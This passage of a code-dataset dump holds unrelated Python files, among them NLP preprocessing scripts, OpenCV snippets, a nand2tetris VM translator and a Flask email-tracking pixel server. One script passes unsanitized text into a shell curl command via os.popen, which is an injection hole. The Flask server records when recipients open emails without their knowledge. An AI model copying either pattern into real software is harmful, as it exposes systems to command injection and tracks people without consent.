str) -> None:\n knp = KNP()\n doc = knp.apply_to_document(text)\n assert doc.text == text.replace(\"\\r\", \"\").replace(\"\\n\", 
\"\")\n\n\n@pytest.mark.skipif(not is_knp_available, reason=\"KNP is not available\")\ndef test_get_version() -> None:\n knp = KNP()\n _ = knp.get_version()\n\n\n@pytest.mark.skipif(not is_knp_available, reason=\"KNP is not available\")\ndef test_is_available() -> None:\n knp = KNP()\n assert knp.is_available() is True\n\n knp = KNP(\"knpppppppppppppppppppp\")\n assert knp.is_available() is False\n\n with pytest.raises(RuntimeError):\n _ = knp.apply_to_sentence(\"test\")\n\n with pytest.raises(RuntimeError):\n _ = knp.apply_to_document(\"test\")\n\n with pytest.raises(RuntimeError):\n _ = knp.get_version()\n\n\ndef test_invalid_option() -> None:\n with pytest.raises(ValueError):\n _ = KNP(options=[\"--anaphora\"])\n\n\ndef test_repr() -> None:\n knp = KNP(options=[\"-tab\"], senter=RegexSenter(), jumanpp=Jumanpp())\n assert (\n repr(knp)\n == \"KNP(executable='knp', options=['-tab'], senter=RegexSenter(), jumanpp=Jumanpp(executable='jumanpp'))\"\n )\n","sub_path":"tests/processors/test_knp.py","file_name":"test_knp.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"93409030","text":"import os\nimport time\nimport pprint\nimport random\nimport json\nimport sys\nfrom tqdm import tqdm\n\n\ndef read(filename):\n with open(filename,'r')as f:\n data=json.load(f)\n return data\n\n\ndef stanford_api(sen,port=9000):\n\n shell = ''' curl --data '%s' ''' %(sen)+ ''' 'http://localhost:%d'''%port+'''/?properties={%22annotators%22%3A%22tokenize%2Cssplit%2Cpos%2Copenie%22%2C%22outputFormat%22%3A%22json%22}' -o - '''\n #print(shell)\n #print(shell)\n result_str = os.popen(shell).read()\n #print(result_str)\n #print(type(result_str))\n # time.sleep(random.uniform(1.5,10.5))\n return result_str\n\ndef parse(output):\n result=[]\n data=json.loads(output)\n if \"sentences\" in data:\n data=data[\"sentences\"][0]\n if \"openie\" in data:\n result=data[\"openie\"]\n return result\n\ndef fetchT(result):\n triples=[]\n for i in result:\n triple=[i['subject'], i['relation'], i['object']]\n triples.append(triple)\n return triples\n\ndef processSen(sen):\n if '\\'' in sen:\n sen=sen.replace()\n\ndef stanfordT(sen,port):\n try:\n result_str = stanford_api(sen,port)\n result = parse(result_str)\n\n triple=fetchT(result)\n\n return triple\n except:\n return []\n\nimport nltk\nfrom nltk.tokenize import WordPunctTokenizer\ndef split2sen(paragraph):\n paragraph=str(paragraph)\n sen_tokenizer = nltk.data.load('tokenizers/punkt/english.pickle') \n sentences = sen_tokenizer.tokenize(paragraph)\n return sentences\n\ndef main():\n filename=sys.argv[1]\n if os.path.isfile(filename):\n print('start process %s.'%filename)\n else:\n return\n data=read(filename)\n newdata=[]\n for i in tqdm(data):\n newi=i\n question=i['question']\n qt=[] \n #if len(question['minie_t'])==0:\n sen=question['text']\n qt=stanfordT(sen)\n newi['question']['stanford_t']=qt\n\n context=i['context']\n newcontext=dict()\n for c in context:\n text=context[c]['text']\n if type(text)==list:\n text=' '.join(text)\n sens=split2sen(text)\n triple=[]\n for sen in sens:\n triple.extend(stanfordT(sen))\n newcontext[c]=context[c]\n newcontext[c]['stanford_t']=triple\n newi['context']=newcontext\n newdata.append(newi)\n assert len(newdata)==len(data)\n outputfile = filename.replace('.json','_stantri.json')\n print('store the data to %s.'%outputfile)\n with open(outputfile,'w')as f:\n json.dump(newdata,f,indent=4)\n\n\n\n \n \n\nif __name__ ==\"__main__\":\n main()\n 
#sen='skdj'\n #stanford_api(sen)\n","sub_path":"preprocess/standford.py","file_name":"standford.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"414990646","text":"from PIL import Image\nimport numpy as np\n\nwith open(\"./tower.jpg\",\"rb\") as file:\n img = Image.open(file)\n img = img.convert(\"RGB\")\n img = img.resize((64,64)) # RGB 값이 64*64의 List형식으로 저장되어 있다.\n data = np.asarray(img)\n '''\n img.save(\"test.png\") # 저장하기\n '''\n\n ","sub_path":"Machine_Learning_Practice/ex)avhash-search.py","file_name":"ex)avhash-search.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"627009048","text":"import cv2 \nimport numpy as np\nimport sys\n\nref_point = []\ncropping = False\n\ndef shape_selection(event, x, y, flags, param):\n # grab references to the global variables\n global ref_point, cropping\n\n # if the left mouse button was clicked, record the starting\n # (x, y) coordinates and indicate that cropping is being performed\n if event == cv2.EVENT_LBUTTONDOWN:\n ref_point = [(x, y)]\n cropping = True\n\n \n elif event == cv2.EVENT_LBUTTONUP: # check to see if the left mouse button was released\n # record the ending (x, y) coordinates and indicate that the cropping operation is finished\n ref_point.append((x, y))\n cropping = False\n\n # draw a rectangle around the region of interest\n cv2.rectangle(image, ref_point[0], ref_point[1], (0, 255, 0), 2)\n cv2.imshow(\"image\", image)\n\n# load the image, copy it, and setup the mouse callback function\nimg = sys.argv[1]\nimage = cv2.imread(img)\nclone = image.copy()\ncv2.namedWindow(\"image\", cv2.WINDOW_NORMAL)\ncv2.setMouseCallback(\"image\", shape_selection)\n\nprint(\"---Select a part of an image to detect rust---\\n\")\nprint(\"*Press r key to reset the selection\\n*Press c to cut de selected area\\n*Press q to quit\")\nprint(\"\\nIf several areas selected, only the last one will be chosen \")\n\n# keep looping until the 'q'|'c' key is pressed\nwhile True:\n # display the image and wait for a keypress\n cv2.imshow(\"image\", image)\n key = cv2.waitKey(1) & 0xFF\n\n # if the 'r' key is pressed, reset the cropping region\n if key == ord(\"r\"):\n image = clone.copy()\n\n # if the 'c' key is pressed, break from the loop\n elif key == ord(\"c\"):\n break\n \n # if the 'q' key is pressed, exit\n elif key == ord(\"q\"):\n sys.exit(\"Exiting...\")\n\n# if there are two reference points, then crop the region of interest\nif len(ref_point) == 2:\n crop_img = clone[ref_point[0][1]:ref_point[1][1], ref_point[0][0]:ref_point[1][0]]\nelse:\n crop_img = clone\n\n","sub_path":"[CV] Rust Detection in OpenCV/selecter.py","file_name":"selecter.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"581347665","text":"#!/usr/bin/env python\n\nimport re\n\n\"\"\"\nНеобходимо создать (не программно) текстовый файл, где каждая строка описывает учебный предмет и наличие лекционных,\nпрактических и лабораторных занятий по этому предмету и их количество. Важно, чтобы для каждого предмета не обязательно\nбыли все типы занятий. 
Сформировать словарь, содержащий название предмета и общее количество занятий по нему.\nВывести словарь на экран.\n\nПримеры строк файла:\nИнформатика: 100(л) 50(пр) 20(лаб).\nФизика: 30(л) — 10(лаб)\nФизкультура: — 30(пр) —\n\nПример словаря:\n{“Информатика”: 170, “Физика”: 40, “Физкультура”: 30}\n\"\"\"\n\nTEXT_FILE = \"task06.txt\"\n\n\ndef init_file(file_name):\n    with open(file_name, \"w\") as t_file:\n        while True:\n            var = input(\"Enter a string (example: 'Информатика: 100(л) 50(пр) 20(лаб)'; leave empty to exit):\\n\")\n            if var:\n                print(var, file=t_file)\n            else:\n                print(\"Empty string. Stop reading input.\")\n                break\n\n\ndef calculate_statistic(file_name):\n    statistics_dict = {}\n    try:\n        with open(file_name, \"r\") as t_file:\n            for line in t_file:\n                chunks = re.sub(\"\\\([^0-9]{1,}\\\)|([:.,—-])\", \"\", line.strip()).split()\n                course_name = chunks[0]\n                course_hours = sum([int(chunks[i]) for i in range(1, len(chunks))])\n                statistics_dict.update({\n                    course_name: course_hours\n                })\n        print(\"Statistic for courses:\")\n        print(statistics_dict)\n    except FileNotFoundError:\n        print(f\"File '{TEXT_FILE}' not found\")\n        exit(1)\n\n\ndef main():\n    init_file(TEXT_FILE)\n    calculate_statistic(TEXT_FILE)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"lesson-5/task06.py","file_name":"task06.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"642021213","text":"from flask import (\n    Flask,\n    send_file,\n    g,\n    render_template,\n    request,\n    make_response\n)\nimport sqlite3\nimport uuid\nfrom datetime import timezone, datetime\nfrom typing import Union\n\nhostname = 'http://127.0.0.1:5000'\n\napp = Flask(__name__)\n\ndef gen_link(db, email: str):\n    id = uuid.uuid4().hex\n    db.execute(\n        'insert into links (id, email, when_read, was_read, is_active) values (?, ?, ?, ?, ?)',\n        (id, email, '', 0, 0)\n    )\n    db.commit()\n    return id\n\ndef is_valid(db, id: str):\n    cursor = db.execute('select * from links where id = ?', (id,))\n    return len(cursor.fetchall()) != 0\n\ndef access(db, id: str):\n    if is_valid(db, id):\n        db.execute(\n            'update links set when_read = ?, was_read = 1, is_active = 0 where id = ?',\n            (datetime.now(timezone.utc).isoformat(), id)\n        )\n        db.commit()\n\ndef to_link(path, id):\n    return f'{hostname}/{path}/{id}'\n\ndef del_link(db, id: str):\n    db.execute('delete from links where id = ?', (id,))\n    db.commit()\n\n# def status_of(db, id: str) -> str:\n#     res = db.execute('select * from links where id = ?', (id,)).fetchone()\n#     return res.when_read if res.was_read == 1 else None\n\ndef is_active(db, id: str) -> bool:\n    row = db.execute('select * from links where id = ?', (id,)).fetchone()\n    if row is None:\n        return False\n    return row['is_active'] == 1\n\n@app.route('/verification/<id>', methods=['GET'])\ndef verify(id):\n    db = get_db()\n    if is_valid(db, id):\n        if is_active(db, id):\n            access(db, id)\n        res = make_response(send_file('./img/1px.png', mimetype='image/png'))\n        res.headers['Content-Type'] = 'image/png'\n        res.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate, max-age=0'\n        res.headers['Pragma'] = 'no-cache'\n        return res\n    print('invalid id')\n    return render_template('error.html', error=f\"wrong id: {id}\")\n\n@app.route('/gen', methods=['GET'])\ndef gen_page():\n    return app.send_static_file('gen.html')\n\n@app.route('/gen', methods=['POST'])\ndef gen():\n    email = request.form.get('email', None)\n    if email is None:\n        return render_template('error.html', error=\"no email provided in request\")\n    id = gen_link(get_db(), email)\n    return render_template(\n        'gen.html',\n        statuslink=to_link('status', id), \n        email=email,\n        link=to_link('verification', id)\n    )\n\n@app.route('/activate', methods=['POST'])\ndef activate():\n    id = request.form.get('id', None)\n    db = get_db()\n    if id is not None:\n        db.execute('update links set is_active = 1 where id = ?', (id,))\n        db.commit()\n        return render_template('activate.html', id=id)\n    return render_template('error.html', error=\"no id provided in request\")\n    \n\n@app.route('/status/<id>')\ndef status(id):\n    row = get_db().execute('select * from links where id = ?', (id,)).fetchone()\n    if row is None:\n        return render_template('error.html', error=f\"no link with id \\\"{id}\\\" found\")\n    return render_template(\n        'status.html',\n        email=row['email'],\n        was_read=('Yes' if row['was_read'] == 1 else 'No'),\n        is_active=('Yes' if row['is_active'] == 1 else 'No'),\n        when_read=row['when_read'],\n        id=id,\n        link=to_link('verification', id)\n    )\n\n@app.route('/del', methods=['POST'])\ndef delete():\n    id = request.form.get('id', None)\n    if id is None:\n        return render_template('error.html', error=\"no id provided in request\")\n    del_link(get_db(), id)\n    return render_template('del.html', id=id)\n\ndef close_db(e=None):\n    db = g.pop('db', None)\n    if db is not None:\n        db.close()\n\ndef get_db():\n    if 'db' not in g:\n        g.db = sqlite3.connect(\n            './links.db',\n            detect_types=sqlite3.PARSE_DECLTYPES\n        )\n        g.db.row_factory = sqlite3.Row\n    return g.db\n\n###############\n\ndef main():\n    app.run()\n    close_db()\n\nif __name__=='__main__':\n    main()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"352415587","text":"import os\nimport yaml\nimport numpy as np\nimport pickle\nfrom fastdata.vocab import Vocab\nfrom fastdata.tokenizer import fair_tokenizer, nltk_tokenizer, spacy_en_tokenizer, spacy_de_tokenizer\nfrom fastdata.utils import text_file2word_lists, word_lists2numpy\n\nconfig = yaml.load(open('config.yml'))['data_process']\n\nif config['tokenizer'] == 'fair':\n    src_tokenizer = fair_tokenizer\n    trg_tokenizer = fair_tokenizer\nelif config['tokenizer'] == 'nltk':\n    src_tokenizer = nltk_tokenizer\n    trg_tokenizer = nltk_tokenizer\nelif config['tokenizer'] == 'spacy':\n    src_tokenizer = spacy_de_tokenizer\n    trg_tokenizer = spacy_en_tokenizer\nelse:\n    raise ValueError('No supporting.')\n\nsrc_train_text = open(config['path']['raw']['src_train'], 'r', encoding='utf-8')\ntrg_train_text = open(config['path']['raw']['trg_train'], 'r', encoding='utf-8')\nsrc_val_text = open(config['path']['raw']['src_val'], 'r', encoding='utf-8')\ntrg_val_text = open(config['path']['raw']['trg_val'], 'r', encoding='utf-8')\nsrc_test_text = open(config['path']['raw']['src_test'], 'r', encoding='utf-8')\ntrg_test_text = open(config['path']['raw']['trg_test'], 'r', encoding='utf-8')\n\nsrc_train_word_lists = text_file2word_lists(src_train_text, src_tokenizer)\ntrg_train_word_lists = text_file2word_lists(trg_train_text, trg_tokenizer)\nsrc_val_word_lists = text_file2word_lists(src_val_text, src_tokenizer)\ntrg_val_word_lists = text_file2word_lists(trg_val_text, trg_tokenizer)\nsrc_test_word_lists = text_file2word_lists(src_test_text, src_tokenizer)\ntrg_test_word_lists = text_file2word_lists(trg_test_text, trg_tokenizer)\n\nsrc_vocab = Vocab()\ntrg_vocab = Vocab()\n\nfor word_list in src_train_word_lists:\n    src_vocab.add_list(word_list)\nfor 
word_list in trg_train_word_lists:\n trg_vocab.add_list(word_list)\n\nsrc_word2index, src_index2word = src_vocab.get_vocab(\n max_size=config['vocab']['src']['max_size'],\n min_freq=config['vocab']['src']['min_freq']\n)\ntrg_word2index, trg_index2word = trg_vocab.get_vocab(\n max_size=config['vocab']['trg']['max_size'],\n min_freq=config['vocab']['trg']['min_freq']\n)\n\nsrc_train = word_lists2numpy(src_train_word_lists, src_word2index)\ntrg_train = word_lists2numpy(trg_train_word_lists, trg_word2index)\nsrc_val = word_lists2numpy(src_val_word_lists, src_word2index)\ntrg_val = word_lists2numpy(trg_val_word_lists, trg_word2index)\nsrc_test = word_lists2numpy(src_test_word_lists, src_word2index)\ntrg_test = word_lists2numpy(trg_test_word_lists, trg_word2index)\n\nif not os.path.exists(os.path.dirname(config['path']['processed']['train'])):\n os.makedirs(os.path.dirname(config['path']['processed']['train']))\n\nnp.savez(config['path']['processed']['train'], src=src_train, trg=trg_train)\nnp.savez(config['path']['processed']['val'], src=src_val, trg=trg_val)\nnp.savez(config['path']['processed']['test'], src=src_test, trg=trg_test)\n\nwith open(config['path']['processed']['src_word2index'], 'wb') as handle:\n pickle.dump(src_word2index, handle)\nwith open(config['path']['processed']['src_index2word'], 'wb') as handle:\n pickle.dump(src_index2word, handle)\nwith open(config['path']['processed']['trg_word2index'], 'wb') as handle:\n pickle.dump(trg_word2index, handle)\nwith open(config['path']['processed']['trg_index2word'], 'wb') as handle:\n pickle.dump(trg_index2word, handle)","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"493434729","text":"import cv2\nimport numpy as np\n\noriginal_img = cv2.imread(\"11.jpg\", 0)\n\n\nimg1 = cv2.GaussianBlur(original_img, (3, 3), 0)\ncanny = cv2.Canny(img1, 50, 150)\n\n\n_, Thr_img = cv2.threshold(original_img, 210, 255, cv2.THRESH_BINARY)\nkernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\ngradient = cv2.morphologyEx(Thr_img, cv2.MORPH_GRADIENT, kernel)\n\n#cv2.imshow(\"original_img\", original_img)\ncv2.imshow(\"gradient\", gradient)\n#cv2.imshow('Canny', canny)\ncv2.imwrite(\"bowl1.jpg\", gradient)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"canny.py","file_name":"canny.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"35838982","text":"# VMtranslator.py\n# Translates code written in VM intermediate language (as defined in the course\n# guidelines) into the Hack Assembly language\n# Author: Alon Aviv (alonav11)\n# Written for the course \"From NAND to Tetris\" - 5/2016\n\nimport os\nimport sys\n\npointer_address = 3\ntemp_address = 5\n\ncomparison_counter = 0\nfunction_counter = 0\n# labels, by function instead of by number? Pay attention that these labels\n# can't be naive - as they might be assigned by someone else\n\n\ndef parse(line):\n \"\"\"\n parses a given VM line and extracts the type of command and\n relevant parameters.\n :param line: String consisting of a single line of VM code\n :return: Tuple of (operand_type, [arg1], [arg2]. 
Returns nothing if line\n is empty or unidentified.\n \"\"\"\n # Removing comments\n line = line.split('//', 1)[0]\n line = \" \".join(line.split())\n words = line.split(' ')\n\n if words[0] in ('add', 'sub', 'eq', 'gt', 'lt', 'and', 'or',\n 'not', 'neg'):\n return 'C_BINARY_ARITHMETIC', words[0]\n\n if words[0] == 'push':\n return 'C_PUSH', words[1], words[2]\n\n if words[0] == 'pop':\n return 'C_POP', words[1], words[2]\n\n if words[0] == 'label':\n return 'C_LABEL', words[1]\n\n if words[0] == 'goto':\n return 'C_GOTO', words[1]\n\n if words[0] == 'if-goto':\n return 'C_IF', words[1]\n\n if words[0] == 'function':\n return 'C_FUNCTION', words[1], words[2]\n\n if words[0] == 'call':\n return 'C_CALL', words[1], words[2]\n\n if words[0] == 'return':\n return 'C_RETURN',\n\n # If line is empty\n return False\n\n\ndef translate_push_pop(action, segment, value, file_name):\n \"\"\"\n :param action: C_PUSH or C_POP according to relevant command\n :param segment: Segment to push and pop from/to\n :param value: Value after segment. Stands for index or static symbol\n :param file_name: Name of file being proceed\n :return: Tuple of assembly lines performing given operation\n \"\"\"\n\n # 'pointer' refers to physical address 3 + value\n if segment == 'pointer':\n return translate_physical_push_pop(action, str(pointer_address+int(\n value)))+('\\n',)\n\n # 'temp' refers to physical address 5 + value\n if segment == 'temp':\n return translate_physical_push_pop(action, str(temp_address+int(\n value)))+('\\n',)\n\n # 'static refers to actual RAM location denoted by symbol given in\n # 'value' field. Actual RAM location is assigned by hack assembler.\n # Symbol is prepended by the name of the file\n if segment == 'static':\n return translate_physical_push_pop(action, file_name + '.'+value)+(\n '\\n',)\n\n # If segment isn't a physical address - it's a constant or an address to\n # a cell holding an address (which is what the boolean below is\n # referring to)\n is_address = True\n\n # Assembly commands for storing address or constant into register D\n load_value_into_d_commands = None\n\n if segment == 'constant':\n is_address = False\n # loading value of index into D\n load_value_into_d_commands = ('@'+value, 'D=A')\n\n else:\n # loading into D the address denoted by given segment and index\n load_value_into_d_commands = ('@'+value, 'D=A',\n '@'+convert_segments(segment),\n 'D=M+D')\n\n # performing pop action using register R15 to temporarily store target\n # address.\n if action == 'C_POP':\n\n assert is_address\n\n return ('//pop '+segment+' '+value+' operation',\n ) + load_value_into_d_commands + ('@R15', 'M=D', '@SP',\n 'M=M-1', 'A=M', 'D=M',\n '@R15', 'A=M', 'M=D', '\\n')\n\n # performing push to value stored in D. 
If segment is an address,\n # loading the contents of said address to D first\n if action == 'C_PUSH':\n commands = ('//push '+segment+' '+value+' operation',\n ) + load_value_into_d_commands\n if is_address:\n commands += ('A=D', 'D=M')\n commands += ('@SP', 'A=M', 'M=D', '@SP', 'M=M+1', '\\n')\n return commands\n\n\ndef translate_physical_push_pop(action, physical_address):\n \"\"\"\n :param action: C_PUSH or C_POP, according to requested operation\n :param physical_address: Physical address of the hack computers RAM\n (not accessible to VM - used for internal implementation\n :return: Tuple of assembly lines performing push or pop on top stack\n item, using given physical address\n \"\"\"\n assert action == 'C_PUSH' or action == 'C_POP'\n if action == 'C_POP':\n return '//pop into physical address '+physical_address, '@SP', \\\n 'M=M-1', 'A=M', 'D=M', '@'+physical_address, 'M=D',\n elif action == 'C_PUSH':\n return '//push from physical address '+physical_address, \\\n '@'+physical_address, 'D=M', '@SP', 'A=M', 'M=D', '@SP', \\\n 'M=M+1',\n\n\ndef convert_segments(segment):\n \"\"\"\n :param segment: Segment section of push/pop command\n :return: Name of address that segment points to in assembly keywords (\n e.g. 'local' -> 'LCL'\n \"\"\"\n assert segment in ('local', 'argument', 'this', 'that')\n\n if segment == 'local':\n return 'LCL'\n elif segment == 'argument':\n return 'ARG'\n elif segment == 'this':\n return 'THIS'\n elif segment == 'that':\n return 'THAT'\n\n\ndef translate_arithmetic(operand):\n \"\"\"\n :param operand: Arithmetic operand (single word) to be translated into\n assembly\n :return: Tuple of assembly lines performing given operation\n \"\"\"\n assert operand in ('add', 'sub', 'eq', 'gt', 'lt', 'and', 'or',\n 'not', 'neg')\n\n is_comparison = False\n is_unary = False\n\n # Line that performs specific arithmetic in each case\n arithmetic_command_line = None\n final_code = ('// '+operand+' operation',)\n\n if operand == 'add':\n arithmetic_command_line = 'D=D+M'\n\n elif operand == 'sub':\n arithmetic_command_line = 'D=D-M'\n\n elif operand == 'and':\n arithmetic_command_line = 'D=D&M'\n\n elif operand == 'or':\n arithmetic_command_line = 'D=D|M'\n\n elif operand == 'eq':\n arithmetic_command_line = 'JEQ'\n is_comparison = True\n\n elif operand == 'gt':\n arithmetic_command_line = 'JGT'\n is_comparison = True\n\n elif operand == 'lt':\n arithmetic_command_line = 'JLT'\n is_comparison = True\n\n elif operand == 'neg':\n arithmetic_command_line = 'D=-M'\n is_unary = True\n\n elif operand == 'not':\n arithmetic_command_line = 'D=!M'\n is_unary = True\n\n # In case of comparison - pop two top items from stack into multi\n # purpose registers R13, R14. Then perform comparison on both registers\n # and save result in register D. 
Realized using assembly labels.\n if is_comparison:\n global comparison_counter\n counter = str(comparison_counter)\n final_code += translate_physical_push_pop('C_POP', 'R14')\n final_code += translate_physical_push_pop('C_POP', 'R13')\n final_code += ('@R13', 'D=M', '@R14', 'D=D-M', '@TRUE_' + counter,\n 'D;'+arithmetic_command_line, '@0', 'D=A',\n '@CONT_'+counter, '0;JMP', '(TRUE_'+counter+')',\n '@1', 'D=-A', '(CONT_'+counter+')'\n )\n comparison_counter += 1\n\n # In case of unary operation - pop one item into multi purpose resister\n # R13, perform relevant operation and save result into register D.\n elif is_unary:\n final_code += translate_physical_push_pop('C_POP', 'R13')\n final_code += ('@R13', arithmetic_command_line)\n\n # In case of binary operation - pop two top items from stack into multi\n # purpose registers R13, R14. Perform operation on both registers and\n # save result in register D.\n\n else:\n final_code += translate_physical_push_pop('C_POP', 'R14')\n final_code += translate_physical_push_pop('C_POP', 'R13')\n final_code += ('@13', 'D=M', '@14', arithmetic_command_line)\n\n # push result stored in register D back into stack\n final_code += ('@SP', 'A=M', 'M=D', '@SP', 'M=M+1', '\\n')\n\n return final_code\n\n\ndef translate_label(label, current_function):\n \"\"\"\n Translates the label VM command to assembly. Label is named in assembly\n according to the following convention: \"function_name$label\"\n :param label: Name of label\n :param current_function: Name of current function\n :return: Tuple containing relevant assembly code\n \"\"\"\n # if function name is empty, no $ sign is added.\n prefix = current_function+'$' if current_function else \"\"\n return '(' + prefix + label + ')',\n\n\ndef translate_goto(label, current_function):\n \"\"\"\n Translates the VM goto command to assembly. Uses the convention:\n \"function_name$label\"\n :param label: Name of label to go to\n :param current_function: Name of function to which the command belongs\n :return: Tuple containing relevant assembly code\n \"\"\"\n # if function name is empty, no $ sign is added.\n prefix = current_function+'$' if current_function else \"\"\n return '@' + prefix + label, '0;JMP', '\\n'\n\n\ndef translate_if(label, current_function):\n \"\"\"\n Translates the VM if-goto command to assembly. Pops the top item in\n the stack. If value is not zero, jumps to given label. Uses the convention:\n \"function_name$label\"\n :param label: Name of label to go to\n :param current_function: Name of function to which the command belongs\n :return: Tuple containing relevant assembly code\n \"\"\"\n # if function name is empty, no $ sign is added.\n prefix = current_function+'$' if current_function else \"\"\n\n return '//if-goto '+label, '@SP', 'M=M-1', 'A=M', 'D=M', \\\n '@'+prefix+label, 'D;JNE', '\\n'\n\n\ndef translate_call(function, arg_num):\n \"\"\"\n Translates into assembly the VM call command. 
Loads all necessary\n commands into the global stack and passes control to called function\n :param function: Name of function being called\n :param arg_num: Number of arguments function accepts\n :return: Tuple containing relevant assembly code\n \"\"\"\n\n global function_counter\n return_label = function + '_RETURN_' + str(function_counter)\n function_counter += 1\n return ('//CALLING FUNCTION '+function, '@'+return_label,\n 'D=A', '@SP', 'A=M', 'M=D', '@SP', 'M=M+1') + \\\n translate_physical_push_pop('C_PUSH', 'LCL') + \\\n translate_physical_push_pop('C_PUSH', 'ARG') + \\\n translate_physical_push_pop('C_PUSH', 'THIS') + \\\n translate_physical_push_pop('C_PUSH', 'THAT') + \\\n translate_physical_push_pop('C_PUSH', 'SP') +\\\n translate_push_pop('C_PUSH', 'constant', arg_num, None)[:-1] + \\\n translate_arithmetic('sub')[:-1] + \\\n translate_push_pop('C_PUSH', 'constant', '5', None)[:-1] + \\\n translate_arithmetic('sub')[:-1] + translate_physical_push_pop(\n 'C_POP', 'ARG') + \\\n translate_physical_push_pop('C_PUSH', 'SP') + \\\n translate_physical_push_pop('C_POP', 'LCL') + ('@'+function,\n '0;JMP',\n '('+return_label+')',\n '\\n')\n\n\ndef translate_function_definition(function, local_variables):\n \"\"\"\n Translates into assembly the VM function definition command. Pushes into\n the stack the relevant number of local variables, initialized to 0.\n :param function: Function name\n :param local_variables: Number of local variables\n :return: Tuple containing relevant assembly code\n \"\"\"\n\n loop_start_label = function + '_DEF_LOOP_START'\n loop_end_label = function + '_DEF_LOOP_END'\n\n return ('//Defining function '+function, '('+function+')', '@0', 'D=A',\n '@R15', 'M=D', '('+loop_start_label+')', '@R15',\n 'D=M', '@'+local_variables, 'D=D-A', '@'+loop_end_label,\n 'D;JGE', '@0', 'D=A', '@SP', 'A=M', 'M=D', '@SP', 'M=M+1',\n '@R15', 'M=M+1', '@'+loop_start_label, '0;JMP',\n '('+loop_end_label+')', '\\n')\n\n\ndef translate_return():\n \"\"\"\n Translates the VM return instruction into assembly. 
Adds return value to\n    stack, removes all other items from stack, restores caller's state and\n    returns control to caller.\n    :return: Tuple containing relevant assembly code\n    \"\"\"\n    return ('//Returning from function', '@ARG', 'D=M', '@R13', 'M=D', '@LCL',\n            'D=M-1', '@R15', 'M=D', 'A=D', 'D=M', '@THAT', 'M=D', '@R15',\n            'M=M-1', 'D=M', 'A=D', 'D=M', '@THIS', 'M=D', '@R15', 'M=M-1',\n            'D=M', 'A=D', 'D=M', '@ARG', 'M=D', '@R15', 'M=M-1', 'D=M', 'A=D',\n            'D=M', '@LCL', 'M=D', '@R15', 'M=M-1', 'D=M', 'A=D', 'D=M',\n            '@R14', 'M=D', '@SP', 'D=M-1', 'A=D', 'D=M', '@R13', 'A=M',\n            'M=D', '@R13', 'D=M', '@SP', 'M=D+1', '@R14', 'A=M', '0;JMP',\n            '\\n')\n\n\ndef add_bootstrap():\n    \"\"\"\n    :return: Tuple of assembly code designated to initialize the program.\n    Sets the stack pointer to be 256 and calls the function Sys.init\n    \"\"\"\n    return ('//Bootstrap code', '@256', 'D=A', '@SP', 'M=D') + \\\n           translate_call('Sys.init', '0')\n\n\ndef add_slash(string):\n    \"\"\"\n    :param string: Any string\n    :return: The given string with an added '/' character at the end,\n    in case it didn't already have that character at the end\n    \"\"\"\n    return string+'/' if not string.endswith('/') else string\n\n\ndef remove_slash(string):\n    \"\"\"\n    :param string: Any string\n    :return: The given string with the '/' character removed from the end,\n    if that string finished with '/' to begin with\n    \"\"\"\n\n    return string[:-1] if string.endswith('/') else string\n\n\ndef translate_file(file_path, output_file):\n    \"\"\"\n    :param file_path: VM file to translate to assembly\n    :param output_file: Target file to write translation to\n    \"\"\"\n    with open(file_path, 'r') as VM_file:\n        current_function = \"\"\n        for line in VM_file:\n            parsed_line = parse(line)\n            # Empty lines (valued as false) are ignored\n            if parsed_line:\n                if parsed_line[0] == 'C_FUNCTION':\n                    current_function = parsed_line[1]\n\n                output_file.writelines(line + '\\n' for line in\n                                       translate_line(parsed_line,\n                                                      current_function,\n                                                      file_path))\n\n\ndef translate_line(line_tuple, current_function, file_path):\n    \"\"\"\n    :param line_tuple: Tuple representing a VM line in the form of\n    (command_type, [arg1], [arg2])\n    :param current_function: Name of function which line is nested in. If empty\n    string, line appears in global namespace\n    :param file_path: Path of file where line is written\n    :return: Translation of line into tuple of assembly lines\n    \"\"\"\n    if line_tuple[0] == 'C_BINARY_ARITHMETIC':\n        return translate_arithmetic(line_tuple[1])\n\n    if line_tuple[0] in ('C_PUSH', 'C_POP'):\n        return translate_push_pop(line_tuple[0], line_tuple[1], line_tuple[\n            2], os.path.basename(file_path).split('.')[0])\n\n    if line_tuple[0] == 'C_LABEL':\n        return translate_label(line_tuple[1], current_function)\n\n    if line_tuple[0] == 'C_GOTO':\n        return translate_goto(line_tuple[1], current_function)\n\n    if line_tuple[0] == 'C_IF':\n        return translate_if(line_tuple[1], current_function)\n\n    if line_tuple[0] == 'C_CALL':\n        return translate_call(line_tuple[1], line_tuple[2])\n\n    if line_tuple[0] == 'C_FUNCTION':\n        return translate_function_definition(line_tuple[1], line_tuple[2])\n\n    if line_tuple[0] == 'C_RETURN':\n        return translate_return()\n\n    # function must return lines\n    assert False\n\n\ndef main():\n    path = sys.argv[1]\n    if os.path.isfile(path):\n        with open(path.split('.')[0] + '.asm', 'w') as output_file:\n            # Adding bootstrap code at start of file\n            output_file.writelines(line + '\\n' for line in add_bootstrap())\n            translate_file(path, output_file)\n\n    elif os.path.isdir(path):\n        dir_name = os.path.basename(path)\n        path = add_slash(path)\n        with open(path+dir_name+'.asm', 'w') as output_file:\n            # Adding bootstrap code at start of 